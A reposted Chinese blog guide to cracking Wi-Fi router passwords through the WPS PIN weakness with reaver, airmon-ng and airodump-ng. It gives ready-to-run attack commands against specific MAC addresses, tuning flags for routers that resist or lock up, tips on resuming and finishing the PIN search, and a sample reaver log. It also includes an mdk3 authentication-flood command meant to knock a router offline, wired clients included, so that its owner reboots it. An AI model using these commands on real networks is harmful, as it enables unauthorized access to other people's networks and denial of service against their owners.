前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >reaver test[通俗易懂]

reaver test[通俗易懂]

作者头像
全栈程序员站长
发布2022-08-19 18:47:03
9430
发布2022-08-19 18:47:03
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

代码语言:javascript
复制
airmon-ng

airmon-ng start wlan0

airodump-ng mon0

apt-get update

apt-get install reaver

reaver -i mon0 -b 28:2C:B2:5E:79:14 -vv

reaver -i mon0 -b 28:2C:B2:5E:79:14 -vv -a -v -S -x 20 -r 100:10 -l 60 -n

路由器防PIN破解 http://download.csdn.net/detail/wugelidong/6486637

http://www.2cto.com/Article/201301/180749.html

http://www.backtrack.org.cn/thread-14804-1-1.html 在坛子里和群里,经常遇到朋友问PIN不动和重码严重如何解决的问题,这的确是一个很棘手的事情,多数情况下很难解决,但并非无路可走,现将本人总结的跑拼之独技奉献给大家: 一、PIN不动和重码严重原因分析及一般应对方法 1、对方路由没开WPS:遇到这种情况,只有一条路可选:放弃跑PIN,抓包吧。 2、一般是信号差:换个好天线或找个好方位。 3、信道干扰严重:半夜起来跑拼,凌晨1点到4点跑还是没改善那就很悲催了。 4、客户端在线,对方电脑开启了防火墙:无端时再跑。 5、路由其他原因:这种情况最复杂,可能被拼死了,需要等待重启,也可能是路由太弱,需要你施展绝技应对。 6、虚拟机运行中出错或网卡断开了连接:重启虚拟机,拔插网卡重新扫描信号。 二、修改水滴参数 除上述一、的第1、6项外,如系2至5原因,可以修改一下水滴参数,或许你会有意外惊喜哦! 目前大家使用较多的cdlinux镜像版本主要包括30211、30513、30608、31214等,其终端处理程序都是一样的,只是个别参数设置有点差异。PIN不动和重码严重时,大家可设置参数如下: 参数一:-a –v –N –x20–r100:10 l300 –t12 –d0 (最佳方案,如想多等会,可将–t12修改为–t15等) 参数二:-a –v –S –x20–r100:10 l300 –t12 –d0 (如重码多且速度太快,可将–d0修改为–d2等) 参数三:-a –v –N –x20–r100:10 l300 –t12 –d0 –S(其他参数也可试一下,不要加-n)

修改完参数后,一定要有耐心让拼码多跑一会,观察一下是否有变化,正常情况下是先慢,然后速度逐步提升,如等待5分钟左右还没动静,那就及时停止,再找机会试吧

http://blog.sina.com.cn/s/blog_61c07ac5010189fz.html

精解reaver用BT5成功PIN解码

PIN码破密特点:

1、不需要客户端

2、有PIN码就能获得无线密码

3、八位数PIN码实际只有一万一千组随机密码

4、抓包、EWSA跑包,每个环节都有很大的不确定性,而PIN破密,只要开户WPS,破密只是个时间问题。 提醒:只限于个人测试使用,由于非法操作引起的相关法律责任与本作者无关。 reaver使用方法、步骤1、打开超级终端 ROOt shell 2、如果电脑装有多个无线网卡,请先发指令

3、 ifconfig -a 4、 确认你用哪一个网卡WLAN0或WLAN1 下面的指令都是以单一网卡 WLAN0为例

一、激活监听模式:

airmon-ng start wlan0

二、查看周边AP信息(抓包): airodump-ng mon0

wash -i mon0 -C

观察要破AP的PWR信号强弱变化,注意同频干扰,调整网卡放置位置和角度、方向。

PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次)

三、按Ctrl+C终止抓包

四、 抓PIN码: reaver -i mon0 -b MAC -vv 例如:

reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -a -S -d 0 -t 1

1.4版可用:

reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v (可用一个v)

注意,MAC中冒号不可省略,MAC地址的字母大小写均可, -vv是两个V不是W!

特别提示: 只有AP开启了WPS、QSS功能,才可以用PIN法破PSK密码!

如何查看AP是否开了WPS、QSS呢? 一、使用指令: airodump-ng mon0 MB一栏下,出现 54e. (看清楚有点“.”) 是开WPS的

AP关闭了WPS、或者没有QSS滴,会出现 WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)

PIN破密对信号要求极为严格, 如果信号稍差 ,可能导致破密进度变慢或者路由死锁等 (重复同一个PIN码 或 timeout ), 特别是1、6默认频道中,有较多的AP,相互干扰,因此,确定网卡放置的最佳位置、方向、角度十分重要。

破解过程中 ,重复同一个PIN码 或 timeout 可随时随地按Ctrl+C终止,reaver会自动保存进度。 重复第2-4项内容,先看看AP信号强弱或是否关机, 若继续破,则再次在终端中发送:

reaver -i mon0 -b MAC -vv 当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。 曙光就在前头,胜利往往在 再坚持一下的努力之中。 如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:

reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)

会从指定PIN段起破密。

额外:(假如pin死了,就用命令强制让路由器重启)

首先检测网卡: ifconfig -a

然后模拟端口: airmon-ng start wlan0

接下来用: airodump-ng mon0 //扫描ap找到你pin死的路由器mac

用mdk3 做身份验证攻击 mdk3 mon0 a -a mac(被pin死的路由器的mac)

身份验证攻击效果说明:

身份验证攻击效果说明: 此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。

说明: 此命令功能强大,使用错误会造成所有ap不能使用,请指定mac地址,然后使用,其余命令不要乱试。你要使用此命令的其他参数,请详细阅读此命令参数详解。

此操作会让路由器完全宕机,不但无线不能用,有线的也连接不了,必须重启路由器!

请谨慎使用!

如果出现99.99%的一直pin的,但就是不出密码,这可能是漏码了,要重新pin,所以一开始pin的时候就再加一个参数。

reaver -i mon0 -b MAC -a -Svvn -d 0

加一个 -n 的参数这样就不会漏码了

http://wifibeta.com/2012-01/thread-606-1-1.html

http://my.oschina.net/superpdm/blog/70862

http://www.2cto.com/Article/201203/122043.html

使用REAVER破解PIN到90.00%~99.99%问题的解决办法

[+] Trying pin 02835679 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK =================== 正常情况下在M4后,会收到WSC NACK包。这是就知道当前的0283是错误的。然后开始试下一个pin. 缺省情况下,如果在M4后没有收到任何包,等待超时后,也会认为当前的pin是错误的,然后开始试下一个pin. 如果是因为丢包的原因,没有收到M5包,显然正确的pin就会当作错误的pin.因此就会出现99.99%的问题。 解决办法很简单: 加上-n 参数即可。 reaver -vvnS -d 0 -b xxxx 注意:reaver 会为每个AP创建一个pin序列文件,这个文件存放在 /etc/reaver/ 或/usr/local/etc/reaver, 文件名字是”AP的MAC”.wpc, 例如:AP的MAC是:FF:FF:FF:FF:FF:FF,那么文件名是 FFFFFFFFFFFF.wpc 这个文件也记录,Reaver已经检测到了哪个pin值。例如已经检测到了99985767,这个值在pin序列 中的位置会被记录到文件中,这样就可以中途停掉reaver.下次开始时,还是从99985767开始。 因此在重新启动reaver之前要先删除这个pin序列文件。 高级用法: 注意如果是90.00%那么前四位是没有跑出来的.直接删除文件即可。 如果是99.99%,pin的前四位已经找到了。在删除.wpc文件之前,用reaver 加上-vv参数,记下前四位 的值。然后再删除.wpc文件。重新开始pin时,使用-pin 设置上面记下的前四位pin.这样就直接开始找 后四位的pin值了。 根据reaver的帮助,reaver缺省情况下会自动检查AP是否回应NACK.因此不需要加-n参数才对。 我看了一下代码,这确实是一个bug. 但是通过加-n参数,可以绕过这个bug.

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/135955.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年5月4,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
多因子身份认证
多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档